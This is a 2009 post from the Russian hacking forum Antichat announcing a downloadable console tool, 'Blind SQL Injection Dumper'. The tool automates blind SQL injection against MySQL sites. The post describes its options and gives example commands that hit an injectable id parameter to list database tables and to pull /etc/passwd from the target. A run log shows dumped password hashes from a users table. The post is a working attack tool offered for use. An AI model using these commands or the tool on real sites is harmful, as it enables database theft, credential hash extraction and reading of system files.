HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
Перезагрузить страницу Blind SQL Injection Dumper
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Blind SQL Injection Dumper
  #1  
Старый 31.10.2009, 03:22
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами: 10153766

Репутация: 2565
По умолчанию Blind SQL Injection Dumper
Blind SQL Injection Dumper v1.1 (Win32 Console)


По мотивам https://forum.antichat.ru/showpost.php?p=1494443&postcount=11

[Описание]
1. Возникает сложность при использовании большой и сложной конструкции запроса, особенно при переборе с использованием LIMIT.
Утилита с ключом -q позволяет автоматизировать этот процесс.
На вход подаете SQL запрос к какой нибудь таблице, прога добавляет условно бесконечный LIMIT на выходе получаете дамп на консоли и в файле.
2. При чтении файла данным способом вывод ограничивается 64 символами.
Утилита с ключом -f позволяет автоматизировать этот процесс и дампить файл блоками по 64 символа.
На вход подаете полный путь до файла который нужно сдампить с целевого хоста, на выходе получаете дамп в файле.


[Синтаксис]
Цитата:
BlindSQLiDumper.exe [full path whith vuln param] -[q,f [param]] [file out(default result.txt)]
param:
-q ["sql query to unlimit repeat"]
-f [full path to filename for download]
Пример для дампа данных:
Цитата:
BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -q "select table_name from information_schema.tables" tables.txt
Пример для дампа файла:
Код:
BlindSQLiDumper.exe test.com /forum/index.php?id=-123' -f /etc/passwd passwd

Особенности:
1. Имя хоста без http://
2. SQL запрос обязательно в кавычках.
3. По умолчанию создается файл result.txt в текущей дире.
4. Имя файла без кавычек, т.к. автоматически преобразует в hex эвивалент.
5. Естественно необходим file_priv = Y

[Лог работы]
Цитата:
========================
Blind SQL Injection Dumper
by [53x]Shadow for Antichat.ru
Based on Qwazar Fast Blind SQL Injection Method
Need MySQL version >= 5.0.*
========================

start...
sql query: select password from users
query result:
358fa3824cfe5ac363f5ec254eafff57
acd455efd4541bf9b2e05f895c957e83
Dump stopped!
𝕏 Twitter Reddit Telegram Копировать ссылку
Вложения
Тип файла: rar BlindSQLiDumper.rar (53.4 Кб, 35 просмотров)
Последний раз редактировалось [53x]Shadow; 21.11.2009 в 17:14..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...